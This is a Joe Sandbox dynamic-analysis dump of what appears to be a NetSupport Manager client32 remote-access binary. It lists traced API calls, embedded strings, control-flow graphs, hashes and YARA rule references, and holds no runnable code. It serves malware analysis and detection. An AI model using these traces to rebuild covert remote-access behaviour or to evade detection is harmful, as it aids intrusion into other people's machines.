                                                                                    • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                      • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                      • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                      • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                      • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                    • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                    • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                      • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                      • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                      • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                    • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                    • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                    • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                    • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                    • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                    • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                    • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                      • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                      • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                      • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                      • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                    • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                    • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                    • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                    • SetWindowPos.USER32(00030462,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                    • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                    • wsprintfA.USER32 ref: 1102FFA5
                                                                                    • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                    • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                      • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,420B7E12,00000002,74DF2EE0), ref: 1112820A
                                                                                      • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                      • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                    • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$364339$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                    • API String ID: 1099283604-953618440
                                                                                    • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                    • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                    • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                    • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52
                                                                                    Function 1102DB00 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 990 1102db00-1102db50 call 1110f420 993 1102db52-1102db66 call 11142a60 990->993 994 1102db68 990->994 995 1102db6e-1102dbb3 call 11142290 call 11142ac0 993->995 994->995 1002 1102dd53-1102dd62 call 11144dc0 995->1002 1003 1102dbb9 995->1003 1009 1102dd68-1102dd78 1002->1009 1005 1102dbc0-1102dbc3 1003->1005 1007 1102dbc5-1102dbc7 1005->1007 1008 1102dbe8-1102dbf1 1005->1008 1010 1102dbd0-1102dbe1 1007->1010 1011 1102dbf7-1102dbfe 1008->1011 1012 1102dd24-1102dd3d call 11142ac0 1008->1012 1013 1102dd7a 1009->1013 1014 1102dd7f-1102dd93 call 1102cc10 1009->1014 1010->1010 1015 1102dbe3 1010->1015 1011->1012 1016 1102dcf3-1102dd08 call 11162de7 1011->1016 1017 1102dc05-1102dc07 1011->1017 1018 1102dd0a-1102dd1f call 11162de7 1011->1018 1019 1102dc9a-1102dccd call 111618c1 call 11142290 1011->1019 1020 1102dcdb-1102dcf1 call 11164010 1011->1020 1021 1102dc8b-1102dc95 1011->1021 1022 1102dccf-1102dcd9 1011->1022 1023 1102dc4c-1102dc52 1011->1023 1024 1102dc7c-1102dc86 1011->1024 1012->1005 1035 1102dd43-1102dd45 1012->1035 1013->1014 1038 1102dd98-1102dd9d 1014->1038 1015->1012 1016->1012 1017->1012 1033 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1017->1033 1018->1012 1019->1012 1020->1012 1021->1012 1022->1012 1026 1102dc54-1102dc68 call 11162de7 1023->1026 1027 1102dc6d-1102dc77 1023->1027 1024->1012 1026->1012 1027->1012 1033->1012 1044 1102de43-1102de5d call 111463d0 1035->1044 1045 1102dd4b-1102dd51 1035->1045 1038->1044 1047 1102dda3-1102ddc8 call 110b7920 call 11146450 1038->1047 1056 1102deb3-1102debf call 1102b4f0 1044->1056 1057 1102de5f-1102de78 call 1105dd10 1044->1057 1045->1002 1045->1009 1067 1102ddd3-1102ddd9 1047->1067 1068 1102ddca-1102ddd1 1047->1068 1070 1102dec1-1102dec8 1056->1070 1071 1102de98-1102de9f 1056->1071 1057->1056 1069 1102de7a-1102de8c 1057->1069 1072 1102dddb-1102dde2 call 11027d60 1067->1072 1073 1102de39 1067->1073 1068->1044 1069->1056 1086 1102de8e 1069->1086 1074 1102dea5-1102dea8 1070->1074 1075 1102deca-1102ded4 1070->1075 1071->1074 1077 1102e0aa-1102e0cb GetComputerNameA 1071->1077 1072->1073 1085 1102dde4-1102de16 1072->1085 1073->1044 1079 1102deaa-1102deb1 call 110b7920 1074->1079 1080 1102ded9 1074->1080 1075->1077 1082 1102e103-1102e109 1077->1082 1083 1102e0cd-1102e101 call 11027c30 1077->1083 1084 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1079->1084 1080->1084 1088 1102e10b-1102e110 1082->1088 1089 1102e13f-1102e152 call 11164010 1082->1089 1083->1082 1110 1102e157-1102e163 1083->1110 1142 1102e07a-1102e082 SetLastError 1084->1142 1143 1102dfbc-1102dfd3 1084->1143 1104 1102de20-1102de2f call 110f6080 1085->1104 1105 1102de18-1102de1e 1085->1105 1086->1071 1094 1102e116-1102e11a 1088->1094 1102 1102e347-1102e36a 1089->1102 1099 1102e136-1102e138 1094->1099 1100 1102e11c-1102e11e 1094->1100 1101 1102e13b-1102e13d 1099->1101 1107 1102e132-1102e134 1100->1107 1108 1102e120-1102e126 1100->1108 1101->1089 1101->1110 1120 1102e392-1102e39a 1102->1120 1121 1102e36c-1102e372 1102->1121 1112 1102de32-1102de34 call 1102d330 1104->1112 1105->1104 1105->1112 1107->1101 1108->1099 1109 1102e128-1102e130 1108->1109 1109->1094 1109->1107 1115 1102e165-1102e17a call 110b7920 call 11029bd0 1110->1115 1116 1102e17c-1102e18f call 11081a70 1110->1116 1112->1073 1147 1102e1d3-1102e1ec call 11081a70 1115->1147 1131 1102e191-1102e1b4 1116->1131 1132 1102e1b6-1102e1b8 1116->1132 1126 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1120->1126 1127 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1120->1127 1121->1120 1125 1102e374-1102e38d call 1102d330 1121->1125 1125->1120 1127->1126 1131->1147 1141 1102e1c0-1102e1d1 1132->1141 1141->1141 1141->1147 1144 1102e043-1102e04f 1142->1144 1143->1144 1161 1102dfd5-1102dfde 1143->1161 1150 1102e092-1102e0a1 1144->1150 1151 1102e051-1102e05d 1144->1151 1166 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1147->1166 1167 1102e32c-1102e339 call 11164010 1147->1167 1150->1077 1157 1102e0a3-1102e0a4 FreeLibrary 1150->1157 1159 1102e06f-1102e073 1151->1159 1160 1102e05f-1102e06d GetProcAddress 1151->1160 1157->1077 1163 1102e084-1102e086 SetLastError 1159->1163 1164 1102e075-1102e078 1159->1164 1160->1159 1161->1144 1162 1102dfe0-1102e016 call 11146450 call 1112b270 1161->1162 1162->1144 1185 1102e018-1102e03e call 11146450 call 11027920 1162->1185 1169 1102e08c 1163->1169 1164->1169 1202 1102e283-1102e299 call 11128ec0 1166->1202 1203 1102e26f-1102e27e call 11029450 1166->1203 1181 1102e33c-1102e341 CharUpperA 1167->1181 1169->1150 1181->1102 1185->1144 1207 1102e2b2-1102e2ec call 110d0bd0 * 2 1202->1207 1208 1102e29b-1102e2ad call 110d0bd0 1202->1208 1203->1202 1215 1102e302-1102e32a call 11164010 call 110d07c0 1207->1215 1216 1102e2ee-1102e2fd call 11029450 1207->1216 1208->1207 1215->1181 1216->1215
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc_memsetwsprintf
                                                                                    • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$364339$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                    • API String ID: 3802068140-1186720100
                                                                                    • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                    • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                    • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                    • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51
                                                                                    Function 110A9C90 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 236libraryloaderCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1657 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 1658 110a9cf8-110a9d09 SetupDiGetClassDevsA 1657->1658 1659 110a9e05-110a9e0d SetLastError 1657->1659 1660 110a9d0f-110a9d1d 1658->1660 1661 110a9f13-110a9f15 1658->1661 1664 110a9e19-110a9e1b SetLastError 1659->1664 1665 110a9d20-110a9d24 1660->1665 1662 110a9f1e-110a9f20 1661->1662 1663 110a9f17-110a9f18 FreeLibrary 1661->1663 1668 110a9f37-110a9f52 call 11161d01 1662->1668 1663->1662 1669 110a9e21-110a9e2c GetLastError 1664->1669 1666 110a9d3d-110a9d55 1665->1666 1667 110a9d26-110a9d37 GetProcAddress 1665->1667 1666->1669 1677 110a9d5b-110a9d5d 1666->1677 1667->1664 1667->1666 1671 110a9e32-110a9e3d _free 1669->1671 1672 110a9ec0-110a9ed1 GetProcAddress 1669->1672 1671->1665 1675 110a9edb-110a9edd SetLastError 1672->1675 1676 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 1672->1676 1678 110a9ee3-110a9ee5 1675->1678 1676->1678 1679 110a9d68-110a9d6a 1677->1679 1680 110a9d5f-110a9d65 _free 1677->1680 1678->1661 1681 110a9ee7-110a9f09 CreateFileA 1678->1681 1682 110a9d6c-110a9d7f GetProcAddress 1679->1682 1683 110a9d85-110a9d9b 1679->1683 1680->1679 1684 110a9f0b-110a9f10 _free 1681->1684 1685 110a9f22-110a9f2c _free 1681->1685 1682->1683 1688 110a9e42-110a9e4a SetLastError 1682->1688 1690 110a9d9d-110a9da6 GetLastError 1683->1690 1691 110a9dac-110a9dbf call 11162b51 1683->1691 1684->1661 1686 110a9f2e-110a9f2f FreeLibrary 1685->1686 1687 110a9f35 1685->1687 1686->1687 1687->1668 1688->1690 1690->1691 1692 110a9e81-110a9e92 call 110a9c30 1690->1692 1699 110a9ea2-110a9eb3 call 110a9c30 1691->1699 1700 110a9dc5-110a9dcd 1691->1700 1697 110a9e9b-110a9e9d 1692->1697 1698 110a9e94-110a9e95 FreeLibrary 1692->1698 1697->1668 1698->1697 1699->1697 1707 110a9eb5-110a9ebe FreeLibrary 1699->1707 1701 110a9dcf-110a9de2 GetProcAddress 1700->1701 1702 110a9de4-110a9dfb 1700->1702 1701->1702 1704 110a9e4f-110a9e51 SetLastError 1701->1704 1708 110a9e57-110a9e71 call 110a9c30 _free 1702->1708 1709 110a9dfd-110a9e00 1702->1709 1704->1708 1707->1668 1708->1697 1712 110a9e73-110a9e7c FreeLibrary 1708->1712 1709->1665 1712->1668
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(setupapi.dll,420B7E12,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                    • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                    • _free.LIBCMT ref: 110A9D60
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                    • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                    • _malloc.LIBCMT ref: 110A9DB3
                                                                                    • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                    • GetLastError.KERNEL32 ref: 110A9E21
                                                                                    • _free.LIBCMT ref: 110A9E33
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                    • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                    • _free.LIBCMT ref: 110A9E64
                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                    • API String ID: 3464732724-3340099623
                                                                                    • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                    • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                    • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                    • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50
                                                                                    Function 11133920 Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 278libraryloadertimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1909 11133920-1113395c 1910 11133962-11133984 call 1105dd10 1909->1910 1911 11133c84-11133c9f call 11161d01 1909->1911 1910->1911 1916 1113398a-1113399e GetLocalTime 1910->1916 1917 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 1916->1917 1918 111339a0-111339bc call 11146450 1916->1918 1925 11133a45-11133a5b GetProcAddress 1917->1925 1926 11133a5d-11133a64 GetProcessHandleCount 1917->1926 1918->1917 1925->1926 1927 11133a66-11133a68 SetLastError 1925->1927 1928 11133a6e-11133a76 1926->1928 1927->1928 1929 11133a92-11133a9e 1928->1929 1930 11133a78-11133a90 GetProcAddress 1928->1930 1932 11133aa0-11133ab8 GetProcAddress 1929->1932 1934 11133aba-11133ac5 1929->1934 1930->1929 1931 11133ac7-11133ad2 SetLastError 1930->1931 1931->1932 1932->1934 1935 11133ad4-11133adc SetLastError 1932->1935 1936 11133adf-11133aef GetProcAddress 1934->1936 1935->1936 1937 11133af1-11133afd K32GetProcessMemoryInfo 1936->1937 1938 11133aff-11133b01 SetLastError 1936->1938 1940 11133b07-11133b15 1937->1940 1938->1940 1941 11133b23-11133b2e 1940->1941 1942 11133b17-11133b1f 1940->1942 1943 11133b30-11133b38 1941->1943 1944 11133b3c-11133b47 1941->1944 1942->1941 1943->1944 1945 11133b55-11133b5f 1944->1945 1946 11133b49-11133b51 1944->1946 1947 11133b61-11133b68 1945->1947 1948 11133b6a-11133b6d 1945->1948 1946->1945 1949 11133b6f-11133b7d call 11146450 1947->1949 1948->1949 1950 11133b80-11133b92 1948->1950 1949->1950 1954 11133c5a-11133c68 1950->1954 1955 11133b98-11133baa call 110637c0 1950->1955 1957 11133c6a-11133c6b FreeLibrary 1954->1957 1958 11133c6d-11133c75 1954->1958 1955->1954 1963 11133bb0-11133bd1 call 1105dd10 1955->1963 1957->1958 1960 11133c77-11133c78 FreeLibrary 1958->1960 1961 11133c7a-11133c7f 1958->1961 1960->1961 1961->1911 1962 11133c81-11133c82 FreeLibrary 1961->1962 1962->1911 1966 11133bd3-11133bd9 1963->1966 1967 11133bdf-11133bfb call 1105dd10 1963->1967 1966->1967 1968 11133bdb 1966->1968 1971 11133c06-11133c22 call 1105dd10 1967->1971 1972 11133bfd-11133c00 1967->1972 1968->1967 1976 11133c24-11133c27 1971->1976 1977 11133c2d-11133c49 call 1105dd10 1971->1977 1972->1971 1974 11133c02 1972->1974 1974->1971 1976->1977 1978 11133c29 1976->1978 1981 11133c50-11133c53 1977->1981 1982 11133c4b-11133c4e 1977->1982 1978->1977 1981->1954 1983 11133c55 call 11027780 1981->1983 1982->1981 1982->1983 1983->1954
                                                                                    APIs
                                                                                      • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                    • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,420B7E12), ref: 1113398E
                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                    • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                    • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                    • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                    • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
